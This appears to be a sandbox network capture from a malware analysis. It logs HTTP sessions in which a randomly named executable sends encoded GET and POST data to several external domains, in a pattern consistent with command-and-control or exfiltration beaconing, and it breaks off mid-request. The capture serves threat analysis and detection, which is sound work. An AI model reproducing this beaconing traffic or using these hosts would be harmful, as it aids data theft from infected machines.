Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49842	206.119.185.141	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:54:51.782474995 CET	489	OUT	GET /4bhh/?m2gpQ=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnuv1rwGVZHrlJTCOHoay8LjwAA5ZI3MNl68qZc1+kbfm1rx6EKcKPurO&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.39978.club Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:54:52.749063015 CET	281	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 06:54:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, no-store, must-revalidate Server: cdn-ddos-cc Data Raw: 33 36 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 5f 67 75 61 72 64 2f 68 74 6d 6c 2e 6a 73 3f 6a 73 3d 72 6f 74 61 74 65 5f 68 74 6d 6c 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 36<script src="/_guard/html.js?js=rotate_html"></script>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49929	199.59.243.227	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:08.282141924 CET	746	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 4b 59 44 35 53 38 4a 6a 59 77 72 34 6d 51 47 73 6a 2b 38 71 75 42 6f 4f 39 61 59 4c 7a 67 66 54 41 6a 32 2f 42 4f 32 57 76 38 56 4e 37 77 57 47 6d 57 4a 79 2b 4c 34 6a 59 66 74 68 4d 36 55 6b 6d 47 50 36 35 62 5a 56 53 2b 4c 5a 61 45 38 64 5a 34 6d 49 5a 57 4c 4f 6e 56 78 2f 42 45 77 56 2f 78 65 61 76 68 50 75 68 52 42 47 34 72 46 61 70 54 76 30 68 75 73 62 73 58 70 5a 41 39 76 41 32 69 52 46 2b 6f 52 45 35 73 55 79 6f 7a 65 61 6c 37 58 75 7a 65 71 4d 2b 66 42 72 49 68 32 66 30 52 65 6e 77 54 6b 61 78 67 72 46 76 6f 65 65 4c 45 35 36 31 65 45 34 78 38 67 6c 4c 69 72 68 65 74 53 6b 6f 41 3d 3d Data Ascii: m2gpQ=VKMOGjG9q3C3KYD5S8JjYwr4mQGsj+8quBoO9aYLzgfTAj2/BO2Wv8VN7wWGmWJy+L4jYfthM6UkmGP65bZVS+LZaE8dZ4mIZWLOnVx/BEwV/xeavhPuhRBG4rFapTv0husbsXpZA9vA2iRF+oRE5sUyozeal7XuzeqM+fBrIh2f0RenwTkaxgrFvoeeLE561eE4x8glLirhetSkoA==
Nov 12, 2024 07:55:08.918442011 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 06:55:08 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 0e73d655-0cd7-4b07-a625-fff914ef9316 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ== set-cookie: parking_session=0e73d655-0cd7-4b07-a625-fff914ef9316; expires=Tue, 12 Nov 2024 07:10:08 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 64 52 46 51 37 77 65 32 38 4f 6a 4e 45 75 4a 76 6a 5a 5a 72 33 57 55 78 6e 51 54 6d 6b 36 2b 65 79 4b 51 77 6a 44 57 54 33 6d 59 30 56 63 4c 57 4b 5a 41 66 65 2f 30 69 70 4e 4d 42 42 2b 34 31 59 6e 63 58 6f 4a 33 68 4e 71 75 48 4b 2f 62 38 4c 43 55 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 12, 2024 07:55:08.918503046 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGU3M2Q2NTUtMGNkNy00YjA3LWE2MjUtZmZmOTE0ZWY5MzE2IiwicGFnZV90aW1lIjoxNzMxMzk0NT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49940	199.59.243.227	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:10.821254015 CET	766	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 59 49 54 35 54 66 52 6a 5a 51 72 2f 34 41 47 73 34 4f 38 75 75 42 6b 4f 39 65 70 55 79 57 76 54 41 43 47 2f 43 50 32 57 6a 63 56 4e 7a 51 57 4a 37 6d 4a 39 2b 4c 30 30 59 65 52 68 4d 36 41 6b 6d 48 2f 36 34 6f 68 53 41 2b 4c 62 52 6b 39 37 61 49 6d 49 5a 57 4c 4f 6e 56 31 5a 42 46 55 56 2f 67 4f 61 31 44 6e 74 2f 42 42 5a 2f 72 46 61 74 54 76 34 68 75 74 34 73 57 31 7a 41 2f 58 41 32 6a 68 46 2b 39 74 48 77 73 56 35 6c 54 65 49 6a 71 47 66 36 2f 36 74 32 63 74 4a 47 78 2f 36 31 6e 66 46 71 78 6f 32 76 78 54 2b 72 71 36 6f 63 69 6b 50 33 66 41 67 38 65 55 45 55 56 4f 4c 54 2f 7a 67 2b 7a 63 55 2b 78 78 49 46 31 76 74 61 62 61 66 72 31 39 37 69 6a 59 3d Data Ascii: m2gpQ=VKMOGjG9q3C3YIT5TfRjZQr/4AGs4O8uuBkO9epUyWvTACG/CP2WjcVNzQWJ7mJ9+L00YeRhM6AkmH/64ohSA+LbRk97aImIZWLOnV1ZBFUV/gOa1Dnt/BBZ/rFatTv4hut4sW1zA/XA2jhF+9tHwsV5lTeIjqGf6/6t2ctJGx/61nfFqxo2vxT+rq6ocikP3fAg8eUEUVOLT/zg+zcU+xxIF1vtabafr197ijY=
Nov 12, 2024 07:55:11.434881926 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 06:55:10 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: b4535f34-6a81-46b9-b1b6-16be6efc99d1 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ== set-cookie: parking_session=b4535f34-6a81-46b9-b1b6-16be6efc99d1; expires=Tue, 12 Nov 2024 07:10:11 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 64 52 46 51 37 77 65 32 38 4f 6a 4e 45 75 4a 76 6a 5a 5a 72 33 57 55 78 6e 51 54 6d 6b 36 2b 65 79 4b 51 77 6a 44 57 54 33 6d 59 30 56 63 4c 57 4b 5a 41 66 65 2f 30 69 70 4e 4d 42 42 2b 34 31 59 6e 63 58 6f 4a 33 68 4e 71 75 48 4b 2f 62 38 4c 43 55 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 12, 2024 07:55:11.434900045 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjQ1MzVmMzQtNmE4MS00NmI5LWIxYjYtMTZiZTZlZmM5OWQxIiwicGFnZV90aW1lIjoxNzMxMzk0NT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49957	199.59.243.227	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:13.366719007 CET	1779	OUT	POST /sciu/ HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.vnxoso88.art Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.vnxoso88.art/sciu/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 59 49 54 35 54 66 52 6a 5a 51 72 2f 34 41 47 73 34 4f 38 75 75 42 6b 4f 39 65 70 55 79 57 6e 54 42 30 61 2f 41 73 65 57 69 63 56 4e 39 77 57 4b 37 6d 4a 67 2b 4c 64 63 59 65 64 78 4d 38 4d 6b 6e 6c 33 36 73 4a 68 53 4b 2b 4c 62 65 45 38 63 5a 34 6d 64 5a 57 62 4b 6e 56 6c 5a 42 46 55 56 2f 6a 6d 61 37 42 50 74 39 42 42 47 34 72 46 57 70 54 76 55 68 75 56 47 73 57 78 4a 41 50 33 41 32 44 78 46 2f 50 46 48 2f 73 56 37 72 7a 66 62 6a 71 4b 45 36 37 61 66 32 63 70 7a 47 32 7a 36 30 7a 54 54 30 67 73 52 32 48 4c 36 67 34 61 70 62 44 41 46 34 66 41 5a 78 38 4d 77 53 69 57 75 51 63 33 64 74 46 49 4d 6a 6e 4a 36 44 58 58 67 63 65 6d 52 2b 46 74 59 2f 30 50 6f 71 68 73 6b 51 72 45 2b 78 4c 51 78 75 43 35 2f 39 63 51 59 59 46 68 57 5a 4b 6d 36 53 2b 49 4b 32 77 45 42 44 71 47 6d 57 43 50 46 4d 31 55 41 37 61 6f 74 77 39 71 78 75 4b 79 37 56 54 48 30 4b 74 54 78 76 61 6c 2f 4a 67 42 58 66 70 45 66 6a 4d 78 54 48 30 2b 41 49 30 67 50 75 47 72 4e 70 65 66 52 [TRUNCATED] Data Ascii: m2gpQ=VKMOGjG9q3C3YIT5TfRjZQr/4AGs4O8uuBkO9epUyWnTB0a/AseWicVN9wWK7mJg+LdcYedxM8Mknl36sJhSK+LbeE8cZ4mdZWbKnVlZBFUV/jma7BPt9BBG4rFWpTvUhuVGsWxJAP3A2DxF/PFH/sV7rzfbjqKE67af2cpzG2z60zTT0gsR2HL6g4apbDAF4fAZx8MwSiWuQc3dtFIMjnJ6DXXgcemR+FtY/0PoqhskQrE+xLQxuC5/9cQYYFhWZKm6S+IK2wEBDqGmWCPFM1UA7aotw9qxuKy7VTH0KtTxval/JgBXfpEfjMxTH0+AI0gPuGrNpefR+ETkTeRO50G3/6wjNR901pxAwUpm8vd1tjFPPORHWseScNv7MS9tchRqSspQhwJkzeNFIXoDTYm6a0S4aVKCk/Gq2AXq8tWM59u0K2anhMrspYubE3JedrvTX4DXB0d9+BXr9qJwEnc9eurydv/p/XgjOBU1ib0gu/K/l3OtVTyTDRfqQcQilQiftgyKQ7/KO7uEg0rR5CuQIhCP5tcF2BKQbDG6kssKs0pVatcWoi3a0edA+7OYAiHXMJvzvnk0M+fk84SCSU52LdlLMkIqi8jB1r5grjPg/c1aahNr4Dl2a2rBYUSzW1StaT0RNBf8xy8A8D3BADxa1dScLZTJeAP2eYbPLutUehi3gFq7KgzTdV6MDLL5svhrGBAYeOfn3d4NTTRQCpCC/loTF3S3Q0OZMzxJH7MFeS6+d0w8YXbSY1L1Fmo0xorMzdKrw1ZF6Zk4cWKCesEsEz5gf4SC1r0CiOKF7uuWzzJBnotnwoHTbBjyXIzhoHu8V/ON7WvEDXDAA0EMuazEJA9LV0OV9m/mItvYEfH0tSoIJCsiZrFZX/iJT5YYnionbpvYjZ6pmt2G61dMDC92+sNFT6Do78+BuOB7LyOuLedfmWrgxA+ppdAFbEZrK471VVqPwH+G6nh9rAtJdVaciPhwiy53c2gRX8/8uPLhhA [TRUNCATED]
Nov 12, 2024 07:55:13.983257055 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 06:55:13 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 6c403a4c-f07e-4bba-9ce7-a3ba8572d7e6 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ== set-cookie: parking_session=6c403a4c-f07e-4bba-9ce7-a3ba8572d7e6; expires=Tue, 12 Nov 2024 07:10:13 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 70 64 52 46 51 37 77 65 32 38 4f 6a 4e 45 75 4a 76 6a 5a 5a 72 33 57 55 78 6e 51 54 6d 6b 36 2b 65 79 4b 51 77 6a 44 57 54 33 6d 59 30 56 63 4c 57 4b 5a 41 66 65 2f 30 69 70 4e 4d 42 42 2b 34 31 59 6e 63 58 6f 4a 33 68 4e 71 75 48 4b 2f 62 38 4c 43 55 4a 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pdRFQ7we28OjNEuJvjZZr3WUxnQTmk6+eyKQwjDWT3mY0VcLWKZAfe/0ipNMBB+41YncXoJ3hNquHK/b8LCUJQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 12, 2024 07:55:13.983273983 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmM0MDNhNGMtZjA3ZS00YmJhLTljZTctYTNiYTg1NzJkN2U2IiwicGFnZV90aW1lIjoxNzMxMzk0NT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49970	199.59.243.227	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:15.929229975 CET	491	OUT	GET /sciu/?m2gpQ=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLYniVjhicuG4fHS3nSlILxZzvAKFwxHmhkRjxK9ClG7JmJxrzRt3MvPo&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.vnxoso88.art Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:55:16.530816078 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 12 Nov 2024 06:55:15 GMT content-type: text/html; charset=utf-8 content-length: 1522 x-request-id: a98f26b9-e555-4655-9713-66f2dacc6e65 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wS0EmAmWCbQ0ISVm78lCHSrP6wMRl5YqLk6nDe9Ehb7RCwE/jlAvS+zz1l73CwuSLkBWcAeIeJi419MjuWibtw== set-cookie: parking_session=a98f26b9-e555-4655-9713-66f2dacc6e65; expires=Tue, 12 Nov 2024 07:10:16 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 53 30 45 6d 41 6d 57 43 62 51 30 49 53 56 6d 37 38 6c 43 48 53 72 50 36 77 4d 52 6c 35 59 71 4c 6b 36 6e 44 65 39 45 68 62 37 52 43 77 45 2f 6a 6c 41 76 53 2b 7a 7a 31 6c 37 33 43 77 75 53 4c 6b 42 57 63 41 65 49 65 4a 69 34 31 39 4d 6a 75 57 69 62 74 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wS0EmAmWCbQ0ISVm78lCHSrP6wMRl5YqLk6nDe9Ehb7RCwE/jlAvS+zz1l73CwuSLkBWcAeIeJi419MjuWibtw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 12, 2024 07:55:16.530895948 CET	975	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTk4ZjI2YjktZTU1NS00NjU1LTk3MTMtNjZmMmRhY2M2ZTY1IiwicGFnZV90aW1lIjoxNzMxMzk0NT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49975	66.29.146.173	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:55:21.616841078 CET	764	OUT	POST /7m52/ HTTP/1.1 Host: www.rtpakuratkribo.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.rtpakuratkribo.xyz Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.rtpakuratkribo.xyz/7m52/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 57 33 54 4f 45 4c 4c 6b 38 56 6e 61 2b 72 73 59 67 31 2b 70 64 74 78 4d 4f 73 45 56 77 4c 4f 61 4e 4c 33 6b 51 72 78 50 6e 46 38 4b 54 4d 53 41 72 6e 46 42 4e 38 6f 52 44 76 6a 61 44 38 61 77 2b 48 71 2b 50 6a 6f 43 55 45 47 62 70 6f 6d 4b 6f 69 30 4a 52 38 59 48 46 50 52 59 7a 7a 72 